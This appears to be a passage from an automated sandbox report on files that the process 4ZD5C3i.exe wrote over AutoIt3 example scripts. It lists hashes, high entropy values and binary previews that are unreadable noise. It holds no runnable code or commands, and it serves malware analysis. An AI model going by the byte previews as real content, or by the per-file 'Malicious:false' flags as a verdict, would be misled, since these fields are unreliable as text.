                                                                                                                                                                                                                                                SSDEEP:24:WpgUNAobhK7hmgUccfGEVkzXEJylo1+hLOCVe9jmJrc0YXUZtwsTO:WplbhK1tUcKez0Ulo14OG24o0jZtwJ
                                                                                                                                                                                                                                                MD5:0095FD579935592B5751DF5E72F478A2
                                                                                                                                                                                                                                                SHA1:2A64433EE5563B6316A18EC6F165335B34C01CEE
                                                                                                                                                                                                                                                SHA-256:8EA9786641D5E8381375C10240DD9D179C7C08469389E260DE6E7DDF887EB9D7
                                                                                                                                                                                                                                                SHA-512:C62B5D9A1A9BC5F8FBFCE8BD91C57E1B8FDA720D8757B6D6FAE6404B4B61FA895BE01234B00DE65CD1A658C608E08B215327BC6626ED307D5BE1C972FAB48DC7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......z.....R.qc+.].G..NS<...<.[?I...f..n.jr=I$43...Omj..B.O.l.KGd.2+!...6.q...6"..R<...[....)-Xw1..._..N4......~^..b...\..%~....L.fxgr..^...w......"..TP0I.iV..m...r.5d......>...x%7.........C.P<>...<.g.J.x.........+.0.Jz....w.`T@.k.T.w.e.G.....9.{.'.Y./._*..M...S...[.S*=g.?.6. ......_.G.zf.J^N..A....j+.%...X\.c...0..&....)...M^6..N.j"....3`....y$.,$...a'$}..lw^...g;.,#......}....... k....y..f6C}...C...e,....B....,.OgL..mO..rxK.8...C....~..I.f.V.?~..8N4..1...s.. ..."..s..#..{~.y. .\.....A...wb.X...KW.P.,.....]......4D...O.m.....).....EU......t.|.U5C|C(r....=..X.J.D..|...-u..-mVw..I.E....B....To....V.#A{Tn.....Sc+G..Q...D.@.{...Z...H...\l9rqH..tXRRlT ..S.....-.g.CG.k.....:4.o......Q.@...}w...4.l.F..j.....&........B.....,.qNk<......?...T...v.p..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MouseGetPos.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):739
                                                                                                                                                                                                                                                Entropy (8bit):7.690844126763746
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:bOBk6jQyjnxMjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZwJdaku:mk6jQyjCjmJrc0YXUZtwsTcJk
                                                                                                                                                                                                                                                MD5:D4F77430CD02DB2D654DD2430F5BD5AC
                                                                                                                                                                                                                                                SHA1:9262FADBC7852B0C350B417BC6A40CC6D4915F83
                                                                                                                                                                                                                                                SHA-256:3764F71362F1D7A40DAC8B44B4CD2FC00DFD0D5449E32E727FC8947C55A000EB
                                                                                                                                                                                                                                                SHA-512:6FB6F5CEBAF6270F3AAFA7183B94209D42ED878C62669932C9B91811B435E80000F19C36DB10BE5C0246D4ECD0CD06AFFE2DFAE66833F9F577AA423201FF04C8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.0X...y'....I..8...:...D.z..q.;...s$....7...*.g.YF*.....i..`qF..7>..........O.A'...#,<-...2\..I#..&..4.8Z.s-I.x...z..,z....F.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..b'Y.......i...dA:...$..f..F..b*.\......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MouseMove.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):786
                                                                                                                                                                                                                                                Entropy (8bit):7.715292213977968
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:m5SxaQxKr3RgeMxJjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ5/6:85Qu3RQxJjmJrc0YXUZtwsT9/Te
                                                                                                                                                                                                                                                MD5:1723B44D28F59954FDBE9B9EBB70BA5D
                                                                                                                                                                                                                                                SHA1:66D2F55231C11C1F349B39AE3D919C43D8DC498E
                                                                                                                                                                                                                                                SHA-256:4DB6FB7CF54E4C8BB305A72B5D76B33995E9D20DA7CEA739123623ECA476E572
                                                                                                                                                                                                                                                SHA-512:B7F101C8E141F7A24ED6898FCEDFF22902EDB44CE4A928E60DA331A67BB6EA6665BE9F2FAF962F362661415D5E445B40D6B9B6DC136C8773A8CB299A1450DF88
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.VR+BJ.v.N....2.....)...@.....WkE..*....Q...h...0..........|..%..._r....v:a.....erb]..(...B....Qj]..w6..h,..9..W.&.F{.......a...4~.$..W<.........J.3.6...8~|.r...l..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......6.......9O.....aqtEi.....W..{....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MouseWheel.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):715
                                                                                                                                                                                                                                                Entropy (8bit):7.638030022347442
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:DTze0HaPtP2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ6Uk0ku:/YVOjmJrc0YXUZtwsT/n
                                                                                                                                                                                                                                                MD5:EAFB8B7725F96A0A0A0887A5BE32B169
                                                                                                                                                                                                                                                SHA1:8EA5D4224EAA058280EF3AB38C3B54682F25C879
                                                                                                                                                                                                                                                SHA-256:EB43FA55410FEA3ACB403BF197E575C49023CD4CD1EF379AFFF47250DB7639C3
                                                                                                                                                                                                                                                SHA-512:C4ECDE0B1F3D90EAF32CD9A1436AE9FFE6E3C2C6BE74EF77B6E3F6468FF55CA947531A5610A6A74355B5CEEE276A4C4E1090EC23C96B1884C8B9C59FF1A93C99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...5._b..G..5U.}X.U..{$.3w..w.-.2.....h.....;.?......)c.......J........'..D?...%z~.j...Y.o.J...#..5V..9....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.Y:....p....j.<..Pk.......E..F....J.k...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MsgBox.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):755
                                                                                                                                                                                                                                                Entropy (8bit):7.701055269469575
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:UOjiXk6zi0BjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZZBDFxku:UOjizi0BjmJrc0YXUZtwsTHFR
                                                                                                                                                                                                                                                MD5:344DC371D3D63284C5D8DF295556C780
                                                                                                                                                                                                                                                SHA1:586788C88545F9A6BC7843BE4F65B1B27B6F39D2
                                                                                                                                                                                                                                                SHA-256:4C117EAC0A6851AA3DDC59E92D1275A52DAD58C704BD7ED6A65C279400473A63
                                                                                                                                                                                                                                                SHA-512:798DA5DF6E81CDB3E5854B098801F8C50C76F60CCA33F079596A9A803CEA5783F5682A50570A682D2E87CD097F59F263120438821E49C3BD2B731E7397B6B8A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:*.*.Z.....{.H1..%....psmRp ..(..n<&.t.u....[>..s..L..:....}zd#y.!.-...NrC4'.N..../.b.".....5..K.a._BG..f.A|..#.w..Z`..}u!.C.D....'..!......%_.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..E...b........|.Z...$......g.(.?.K.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MsgBox[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):862
                                                                                                                                                                                                                                                Entropy (8bit):7.725949221232393
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:I2htJzLCvXBvUSshOjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZAH:X3LcvUS1jmJrc0YXUZtwsT6Ek
                                                                                                                                                                                                                                                MD5:2C61FEFEA717FF0A68F69D1BC284A2BF
                                                                                                                                                                                                                                                SHA1:C3DE1CA343E4EC1941BF9D7164B28DC9AC3A4641
                                                                                                                                                                                                                                                SHA-256:AB567CD13DA33CE507A1172A0E4223032B0EDB3330A3647EC99D0648232DC7C7
                                                                                                                                                                                                                                                SHA-512:DAA4FBCAB44777C6C0C2E1136EDB71FECF9352745B73E94019EFFC14E58737CD063742C64D89F3D8E566BC272A81F38DADFFF3945BF4465E5FA5FA56DCBC5812
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...b..C^A..V.. 9.i-7....}y`..z...g..>..U..=<J..`.G.J..........&....We.,j.....+.V._k<1...1..*.........Q.>>j.xo..{.&l%.U. . ....BClR.z....+..!..,s..t...P.h.R.3..eBj.I)....S.X.Cte.f....fm ..f....}..)....4..#.....X.R......(.RuC.....vd+...Rc.......L.6.e..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.t<.....Nc..I.US~o..........>....?=.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\NoTrayIcon.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):992
                                                                                                                                                                                                                                                Entropy (8bit):7.779674415149231
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:kq46J7KtGml+25C5HPvxZxkcujmJrc0YXUZtwsTSCL8a:kq46J7M/l+hTxs4o0jZtw/I
                                                                                                                                                                                                                                                MD5:E80F56F04CD973978A2D11031FDF26D6
                                                                                                                                                                                                                                                SHA1:5DD91DD8FC3D5B0D648FD7697324D21D5342C89F
                                                                                                                                                                                                                                                SHA-256:A10AB5F53C4E2DF1ADF3DFC00C060AA8223939A345A9D8FBBAFF19E4E4BBCC58
                                                                                                                                                                                                                                                SHA-512:EC9F956D475694A2BFE47CC68C48D0D09B8FAEE7B73EAEA9A8F9F598B8D05F9B2232E9C2D010DCAB19A92745BB887F0490DE2D89489EEF4760AB61067BF9FA69
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:_...n.h.!.....M....#E.9S.....8Q~.8..t41..Y.`..N...w>...........B........W.0-..34.--...0...r...w..`_.R....c...[..LW........+.x.Y....yn...f..eh.80..F;.....p.1....V...sV!..c..4O.Xb..8e.bph..`.'f.T...`.z....N:....n.G.4b.p|...JK..;.!...E........."rQ...y.*...$..Bz./Q....._..W.....]..I....%HR8.R..1.............'..?..)..~.......s.z.Y.o..Q...._.^..G.."Y..\....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.?..T...)N.D.tf.. .r.T}...NdhoVE.L....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Null.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):751
                                                                                                                                                                                                                                                Entropy (8bit):7.68773422260907
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:UEKH1KEr6oTDMq2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZogs+:1JxonMfjmJrc0YXUZtwsT1spgD
                                                                                                                                                                                                                                                MD5:6BECBC04D1238FC2D2D2937C866C7A03
                                                                                                                                                                                                                                                SHA1:AC1806E52EC7A4FE93BF127B3FDBD3BD4058F923
                                                                                                                                                                                                                                                SHA-256:A7413FF4812CAEECAEC924CF3CDA7ED02E4C82A1F05AA4D6978636E82A882A92
                                                                                                                                                                                                                                                SHA-512:F18FEA1FF0EFE74598561FB84CBED60C14E151F991577BD65727B2927DEBE73DB1DE4F9E665E7F5928DB96524D1C39A5991DA000FADB0130A45308D07E0034F4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.dt..EA}..2.J.:..9ki<..`.1.3.R .n....3R] ..Y...2..j.....n..%3k......@.......b.<4..v..~...9.EDS`......).Y..S./(G.w#.(.w...Z*.....Hr.b|..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.C.~...[..D....Mf...p~...-.I}.l^......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Number.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2124
                                                                                                                                                                                                                                                Entropy (8bit):7.899577163856014
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:X7k4JBfFlXb2xowoF3028xVdqeAHAizD4Feo4o0jZtw7ExO:Y6X0g3PCkZZXemle7qO
                                                                                                                                                                                                                                                MD5:175527701705B9905C186063787098CE
                                                                                                                                                                                                                                                SHA1:EFF375F93E22B6356FBA21DD00736D111F1FE473
                                                                                                                                                                                                                                                SHA-256:6BD2661A0D9670B900BE8E8A41007FCBE7C4300DD0311C46B8979EC63C5DF9FE
                                                                                                                                                                                                                                                SHA-512:64C2BA651B1B814F644C532A2ABFCA5C072D4F51E6C1985775CA2F4BDC0D25BBFA2E718332C089B21B6B859199F59BBC1348BCA7EF2E69EF1D2CAFA50069C310
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:P.7...*..e..".*...x....F..r.S..n2....:..'....t....#..|....T,....<...r522.5..^.2./C.9....i..P6..L.^..k...[ty...].e.5....l.*OrN..s.........Jb..n...U.0..t..7.NL9.........v...E...h....l.<e..y..."..........Q...`..;5...+..........Q B.O%0....8]<.<(~..=....q.;...(.c.co....T.?._.+...m,..&..P.wl..er.....`......1Nq0.mk...Z^,d.W..%..r..7...o9..G...zFJ......-'.S..]..VF{T.w8^..A....m<T..W#.E..L.e.`.&D....4.+6.8...x?..P]._e.?........w..B..*..c....q'..@<a.Dk.J....?r.1.....}.[~a[...0.+A.....j_..rgm.....3.}Q....n....@...7........F.(......E.+. .....ON.H..........>+&D.....I2.G.}...6v....."oJd..A.....MN..T-....S........`j.-`.$.%5..W.Y..Y......e....!..'...p5.+.)(\..2.e.UYj.P....+........n.[%....+.....@?.. ..h..To....~.b.....-.....rM..0...K0..o...Mc6y>.t........+.&...1mk]8...F.(`[k....t..Su..y..A.2.v.Pf._......[..L....+...{G..h.v..E.......*....-sq.2e>`..E{[...V.{y..........|.w...V.o.P.....1........`.k.EY.7s.}....U/....6|L....,T..m.H.#2m..>h.>Vg.i.H.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjCreate.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1191
                                                                                                                                                                                                                                                Entropy (8bit):7.8191153350909355
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:GeFpvqj/l/0Pk+bpWrLk3y12jmJrc0YXUZtwsT3cOJ:ZFpiDF0Pkf4i24o0jZtwkX
                                                                                                                                                                                                                                                MD5:367E5115F7E87796F2D523E01DC6D415
                                                                                                                                                                                                                                                SHA1:1AB1BAF7B5C200CF3B01365B1957DFBF77282182
                                                                                                                                                                                                                                                SHA-256:9FA182AB68D0A100058722AC99E97A8F770F06E70F76FCD20C9EDEFE467D199D
                                                                                                                                                                                                                                                SHA-512:BF9643691DC04B64C139CA9B0549CC52B6031234C7B26C9194FC186A9D2A117B5E7D0C606AA165B3A0E529FCA4EDD1A858AC6EB6B513FF945A496ECA59FA011E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..c'.g;.A...{..ht...7Y..1.%....F...0..#... ..Cx$.\...$...../...w\h..?p.*.~.....E.7...7..vM.>S.....,...BX...0.<.y................k]#M...M...\.......6.?...,.C.J.....r..3.$rvT..~..%w....3..@R26O.d....H<E.Tf...u.#}.t.Z.0./A..R...:.....r_...A.<.`...1uT.q.r.v..IO....F..l....tq.n.'<....a...=...........8)8 .nJ..\...|L$....d..N..:Y..s..ET$....*`...+....*.;W..b...N.E.Z..~......b......a.o.{...K?m....3A8...{|..F.............sH1+[.eM.....=..|..9..67.c....m.y.w.zq...>.......::....q...N3....#.=v...h}Se.n..n.............+.u......LV..z..+V.. 1e..d.$.H.S--Y+...p.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mk

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjCreateInterface.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1992
                                                                                                                                                                                                                                                Entropy (8bit):7.893868396517833
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:EdbqT0NL1OkJ1kK9G5Epr1uyliD64I4o0jZtwaJy:DSoRepr13lizZleaJy
                                                                                                                                                                                                                                                MD5:7B63F6313F079BF3B39A00AB8797CBDC
                                                                                                                                                                                                                                                SHA1:9889BE2EF7696534ADED980B7925050FE935CFD9
                                                                                                                                                                                                                                                SHA-256:076456082706388D8C0A1061BBF145A6ABFF38CCB54512CB771D99CD29FA2FD5
                                                                                                                                                                                                                                                SHA-512:8D128FCCF6AB170BFF4B95E4CBEEC965714A44CA9DF3D90D503BC89CD9CE68DD175433ED4F5541FA341472D52A2CEC406F424EC0158832B4344FDBE17BDD4A55
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.o....i8C.T.....L./3#......^A.3..h....Q_.....b.m.S}..eiW.P.....=...-'....p.7l{U.`d.5.t.....4./...j...i ...:j.......}...../Cb.........F..B78.].zt.EW....i.;.V.....`.V$....WI...F...._..:.8...Z]..q..L..2.6..=...e..~...s....K.J.a.g.2..."I.WV.."...vHG.;...f...c.s^^..v.9....(t..w.2.j`.X.._...+|r..o^.ok....M.y..._|.....#...o.k},..jH.Y.B$. >...sy...#.....~_QF.....g......]}.'C1..q..5..n.m.}..f...L..0.<...(<.1.p....v.7^.M..u.o...id.q.~9..,.V...\.=.}....A1....F.{."$...m....-.][W.T...A._.t.....I.D..I2.x#<..Q.......P..{..F.J3..L....3..O. D.......Q...Z]..{q*...Y.g.-..cB$..`bo..g....~!.....O...pv...J.l..D.N.;.j..n...xk"X...P....j....eL.i?...U.%.....)j....3d....=........../+,.....q._+.X..\....N.lx.........1.....U...... .w.........1c.#...@[gnK.w..T....W.|......q%1j.."......+..>LXt..EA|.;....../...m.Vgd..A.xE2.....H...........I&;..W. V.g+....c.. .B.<.............W.f.4...3S.V....7'.n..^(H.n\..@.*@.)..]8.?.6.S'..-(\.!.`6..1.]qb...>...F..3w..^K..S...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjCreate[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1123
                                                                                                                                                                                                                                                Entropy (8bit):7.8109726037518135
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:eHu/lW0Iyp53uz7cCrTv2jmJrc0YXUZtwsTOhO:rlWfyp5ez7xvI4o0jZtwLO
                                                                                                                                                                                                                                                MD5:2034623B368729C3025E4B094F90F22B
                                                                                                                                                                                                                                                SHA1:37C38E44114D6517030454FFD7AD998C4B75E81E
                                                                                                                                                                                                                                                SHA-256:1898AC8DDE34B815D2809CD39B7011AF1D436F21E5789FBC5E59731E35CFCEB6
                                                                                                                                                                                                                                                SHA-512:69DE1C90AFD2BD55C2B4942AEC01D7F900852A01BDFA8BEE597AB84EE00350F35F2F9FA45766D4E131EBEE2F08BBD82DCB26FD68A45ADBEA0601B809B03F85F4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<8....@WB...%.(....!1p=-.d...G`.......S.;.hwC......5.\._q.g.b.....A..-,o.=*.......qu.w.O.....t....I....f8....W..u.!.-........|R.E...O-.........0.YW&...Hw...NR.!..#...'..[....Y...3...k.cu.(.U.[rT...9.a.=,..%|.?.+.."...D.V.5j......F76..H>.u{.4.,..uk...RZ+.......U.R..sNw.....k=.3..+`.g.p.:..H..rE]E{...m.J...A.....,.4.%.^.:5......6.....?-..6..:.J....M.'..wh^hE.A`.k...e/..Xdw.E....i...G.{j...U....3...1z.#...!..]kn..,.....N.KG&.!Y..60.'...Ad%........4..e....Mu...{.6]...Pi........q......g"L..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjEvent.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3695
                                                                                                                                                                                                                                                Entropy (8bit):7.936894841499305
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:QECip9skaSr8LHoizmEOFa+5aPFpRHQCAlel:Qi9sxSr8M9EWantHQnUl
                                                                                                                                                                                                                                                MD5:6661334F3FE4EDE124459BE15C368E5C
                                                                                                                                                                                                                                                SHA1:4361CB374A6E4AC77603646B117B05D28AD8A91C
                                                                                                                                                                                                                                                SHA-256:FAC218A5CED3B525C950A21A3FBC336A1E9B85B16CB974CA92546C54D991610C
                                                                                                                                                                                                                                                SHA-512:04F53EC365551ED956DE8BAFF5D3FCD389D1A6DA6B37C66BC749D2C08297EAF067BAAC09F24C42E972D0456712F718261E1E3CB82D2EFC2CE9F215FEF9278D23
                                                                                                                                                                                                                                                Malicious:false
